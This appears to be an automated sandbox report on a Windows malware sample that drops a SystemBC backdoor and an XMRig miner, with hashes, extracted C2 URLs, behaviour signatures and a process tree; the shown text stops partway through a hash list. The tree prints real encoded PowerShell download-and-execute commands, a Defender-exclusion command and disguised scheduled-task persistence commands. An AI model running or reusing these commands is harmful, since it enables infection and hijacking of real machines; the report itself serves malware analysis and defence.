Analysis
-
max time kernel
149s -
max time network
153s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
04/05/2023, 11:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
file.exe
Resource
win10v2004-20230220-en
General
-
Target
file.exe
-
Size
95KB
-
MD5
92e79e8ed958f7289702c96fe03de5a5
-
SHA1
e16dede58a351b4bcc4e7b973fdec6c3ec3e98ce
-
SHA256
d540f75897495102dd30eaa924623ac40415e8a716bdcbadf7d7c9a00feb5c97
-
SHA512
fa0225f2f28eefd066a4d803586f7edcd3416b05c64ee6070e3d55a327ba7d68d245b7f669975d9aa34d7edc3a585fe05e633a38dfa19469488c58e09b832943
-
SSDEEP
1536:BfbO0u8DiUPCrElGBWHNC68MVlPjgNJiWUex4bmR+w/Y2tKSG8xB2ncSVKC29m+l:VbEUPCrElGsHNC68MVlPjgNJiWUexfNh
Malware Config
Extracted
http://62.204.41.23/o.png
Extracted
http://62.204.41.23/file.png
Extracted
http://62.204.41.23/r.png
Extracted
systembc
185.161.248.16:4440
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
description pid Process procid_target PID 916 created 1200 916 OneDrive.exe 15 PID 916 created 1200 916 OneDrive.exe 15 PID 916 created 1200 916 OneDrive.exe 15 PID 1656 created 1200 1656 OneDrive.exe 15 PID 1656 created 1200 1656 OneDrive.exe 15 PID 1656 created 1200 1656 OneDrive.exe 15 PID 1656 created 1200 1656 OneDrive.exe 15 -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ dllhost.exe -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral1/memory/1656-153-0x000000013FE20000-0x00000001407EA000-memory.dmp xmrig behavioral1/memory/1260-179-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-184-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-191-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-195-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-199-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-203-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-206-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-210-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-214-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-218-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/1260-222-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Blocklisted process makes network request 5 IoCs
flow pid Process 5 1148 powershell.exe 6 1168 powershell.exe 7 864 powershell.exe 10 1168 powershell.exe 11 1168 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion dllhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion dllhost.exe -
Executes dropped EXE 5 IoCs
pid Process 916 OneDrive.exe 1924 dllhost.exe 1716 lsass.exe 1656 OneDrive.exe 2040 lsass.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2647223082-2067913677-935928954-1000\Software\Wine dllhost.exe -
Loads dropped DLL 3 IoCs
pid Process 1168 powershell.exe 1508 taskeng.exe 1716 lsass.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = "C:\\ProgramData\\lsass\\lsass.exe" lsass.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 1924 dllhost.exe 1716 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe 2040 lsass.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 1656 set thread context of 1452 1656 OneDrive.exe 61 PID 1656 set thread context of 1260 1656 OneDrive.exe 62 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1360 schtasks.exe 1672 schtasks.exe 1688 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1348 timeout.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2040 lsass.exe -
Suspicious behavior: EnumeratesProcesses 27 IoCs
pid Process 864 powershell.exe 2008 powershell.exe 1168 powershell.exe 1148 powershell.exe 1168 powershell.exe 1168 powershell.exe 916 OneDrive.exe 916 OneDrive.exe 916 OneDrive.exe 916 OneDrive.exe 1544 powershell.exe 1168 powershell.exe 1168 powershell.exe 916 OneDrive.exe 916 OneDrive.exe 1924 dllhost.exe 1168 powershell.exe 1168 powershell.exe 1656 OneDrive.exe 1656 OneDrive.exe 1656 OneDrive.exe 1656 OneDrive.exe 560 powershell.exe 1656 OneDrive.exe 1656 OneDrive.exe 1656 OneDrive.exe 1656 OneDrive.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of AdjustPrivilegeToken 18 IoCs
description pid Process Token: SeDebugPrivilege 864 powershell.exe Token: SeDebugPrivilege 2008 powershell.exe Token: SeDebugPrivilege 1168 powershell.exe Token: SeDebugPrivilege 1148 powershell.exe Token: SeShutdownPrivilege 1440 powercfg.exe Token: SeDebugPrivilege 1544 powershell.exe Token: SeShutdownPrivilege 1588 powercfg.exe Token: SeShutdownPrivilege 1804 powercfg.exe Token: SeShutdownPrivilege 280 powercfg.exe Token: SeShutdownPrivilege 544 powercfg.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeShutdownPrivilege 640 powercfg.exe Token: SeShutdownPrivilege 2040 powercfg.exe Token: SeShutdownPrivilege 392 powercfg.exe Token: SeDebugPrivilege 1716 lsass.exe Token: SeLockMemoryPrivilege 1260 conhost.exe Token: SeLockMemoryPrivilege 1260 conhost.exe Token: SeDebugPrivilege 2040 lsass.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe 1260 conhost.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1716 lsass.exe 2040 lsass.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1776 wrote to memory of 2008 1776 file.exe 28 PID 1776 wrote to memory of 2008 1776 file.exe 28 PID 1776 wrote to memory of 2008 1776 file.exe 28 PID 1776 wrote to memory of 864 1776 file.exe 30 PID 1776 wrote to memory of 864 1776 file.exe 30 PID 1776 wrote to memory of 864 1776 file.exe 30 PID 1776 wrote to memory of 1168 1776 file.exe 31 PID 1776 wrote to memory of 1168 1776 file.exe 31 PID 1776 wrote to memory of 1168 1776 file.exe 31 PID 1776 wrote to memory of 1148 1776 file.exe 33 PID 1776 wrote to memory of 1148 1776 file.exe 33 PID 1776 wrote to memory of 1148 1776 file.exe 33 PID 1168 wrote to memory of 916 1168 powershell.exe 36 PID 1168 wrote to memory of 916 1168 powershell.exe 36 PID 1168 wrote to memory of 916 1168 powershell.exe 36 PID 1928 wrote to memory of 1440 1928 cmd.exe 41 PID 1928 wrote to memory of 1440 1928 cmd.exe 41 PID 1928 wrote to memory of 1440 1928 cmd.exe 41 PID 1928 wrote to memory of 1588 1928 cmd.exe 42 PID 1928 wrote to memory of 1588 1928 cmd.exe 42 PID 1928 wrote to memory of 1588 1928 cmd.exe 42 PID 1928 wrote to memory of 1804 1928 cmd.exe 43 PID 1928 wrote to memory of 1804 1928 cmd.exe 43 PID 1928 wrote to memory of 1804 1928 cmd.exe 43 PID 1928 wrote to memory of 280 1928 cmd.exe 44 PID 1928 wrote to memory of 280 1928 cmd.exe 44 PID 1928 wrote to memory of 280 1928 cmd.exe 44 PID 1544 wrote to memory of 1360 1544 powershell.exe 45 PID 1544 wrote to memory of 1360 1544 powershell.exe 45 PID 1544 wrote to memory of 1360 1544 powershell.exe 45 PID 1168 wrote to memory of 1924 1168 powershell.exe 46 PID 1168 wrote to memory of 1924 1168 powershell.exe 46 PID 1168 wrote to memory of 1924 1168 powershell.exe 46 PID 1168 wrote to memory of 1924 1168 powershell.exe 46 PID 1168 wrote to memory of 1716 1168 powershell.exe 50 PID 1168 wrote to memory of 1716 1168 powershell.exe 50 PID 1168 wrote to memory of 1716 1168 powershell.exe 50 PID 1168 wrote to memory of 1716 1168 powershell.exe 50 PID 1508 wrote to memory of 1656 1508 taskeng.exe 51 PID 1508 wrote to memory of 1656 1508 taskeng.exe 51 PID 1508 wrote to memory of 1656 1508 taskeng.exe 51 PID 584 wrote to memory of 544 584 cmd.exe 53 PID 584 wrote to memory of 544 584 cmd.exe 53 PID 584 wrote to memory of 544 584 cmd.exe 53 PID 584 wrote to memory of 640 584 cmd.exe 57 PID 584 wrote to memory of 640 584 cmd.exe 57 PID 584 wrote to memory of 640 584 cmd.exe 57 PID 584 wrote to memory of 2040 584 cmd.exe 58 PID 584 wrote to memory of 2040 584 cmd.exe 58 PID 584 wrote to memory of 2040 584 cmd.exe 58 PID 584 wrote to memory of 392 584 cmd.exe 60 PID 584 wrote to memory of 392 584 cmd.exe 60 PID 584 wrote to memory of 392 584 cmd.exe 60 PID 560 wrote to memory of 1672 560 powershell.exe 59 PID 560 wrote to memory of 1672 560 powershell.exe 59 PID 560 wrote to memory of 1672 560 powershell.exe 59 PID 1656 wrote to memory of 1452 1656 OneDrive.exe 61 PID 1656 wrote to memory of 1260 1656 OneDrive.exe 62 PID 1716 wrote to memory of 1688 1716 lsass.exe 63 PID 1716 wrote to memory of 1688 1716 lsass.exe 63 PID 1716 wrote to memory of 1688 1716 lsass.exe 63 PID 1716 wrote to memory of 1688 1716 lsass.exe 63 PID 1716 wrote to memory of 2040 1716 lsass.exe 66 PID 1716 wrote to memory of 2040 1716 lsass.exe 66 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1200
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:864
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Roaming\OneDrive.exe"C:\Users\Admin\AppData\Roaming\OneDrive.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:916
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1924
-
-
C:\Users\Admin\AppData\Roaming\lsass.exe"C:\Users\Admin\AppData\Roaming\lsass.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1716 -
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 13:11 /du 23:59 /sc daily /ri 1 /f5⤵
- Creates scheduled task(s)
PID:1688
-
-
C:\ProgramData\lsass\lsass.exe"C:\ProgramData\lsass\lsass.exe"5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2040
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmpAB0F.tmp.bat""5⤵PID:848
-
C:\Windows\SysWOW64\timeout.exetimeout 76⤵
- Delays execution with timeout.exe
PID:1348
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1148
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1804
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:280
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1544 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1360
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "OneDrive"2⤵PID:1712
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn OneDrive /tr 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe'3⤵
- Creates scheduled task(s)
PID:1672
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:584 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:640
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:392
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:1452
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1260
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {575E6A1F-23C1-42FD-B73C-1F219DAF77C6} S-1-5-21-2647223082-2067913677-935928954-1000:BPOQNXYB\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exeC:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1656
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
PID:544
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
1.7MB
MD5eb85c562249e96d7a946111241f0ea4b
SHA15c89db5dad53c26ec1f8189261a7fc4eace18773
SHA25695f47af1a69cb5ee8b7a85ff7e17901819813f7d2035bec40a73d2c8f76540c8
SHA512ee193460fc300d57bee2a57794bebfe7edbf22a72764faf42a8e8dd90f65603058e511f51f4a2aab7342febbe9a054c49c8d55eb5c6cd09fb3b983040ac84f77
-
Filesize
154B
MD5c806f64c31e21c3666f85e56742415fc
SHA1dcd8858dfd630291a883dee7222658254f032ae2
SHA25667eb1f54e650502ca8657f2662a4fa1ad0e4f9afc6cbabca7ce727e7ec6c2f30
SHA512dc28d54babde63c0b963565f3dfed51dbb47e71d63dad05f34ff5b1bac6a9eeb52dc254e2474079336713d02eacd87ac152bc5d939424b24a5301a125d2835d6
-
Filesize
154B
MD5c806f64c31e21c3666f85e56742415fc
SHA1dcd8858dfd630291a883dee7222658254f032ae2
SHA25667eb1f54e650502ca8657f2662a4fa1ad0e4f9afc6cbabca7ce727e7ec6c2f30
SHA512dc28d54babde63c0b963565f3dfed51dbb47e71d63dad05f34ff5b1bac6a9eeb52dc254e2474079336713d02eacd87ac152bc5d939424b24a5301a125d2835d6
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VFGT614IOTTHEWPCCQHP.temp
Filesize7KB
MD52b79c8fa82fa40a5b333f4c5319f7525
SHA189c5e12fa4d9163087fde50b1e5783190c0d8c20
SHA256b72bee67c476f595d7c77812032c5ebd96d2ceb3923a27752ff11465b0d7900e
SHA51206c58203498f3095ce03df1d4965bcce927c68335c2cd79b193add464e90e5b1b1952b8a3f54c6ba7e635be9947d6d64771bee857c4c2ad64b0b111f81a054b5
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83
-
Filesize
9.8MB
MD5743022328f955e2cbb5f2f375bd0ab72
SHA1226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
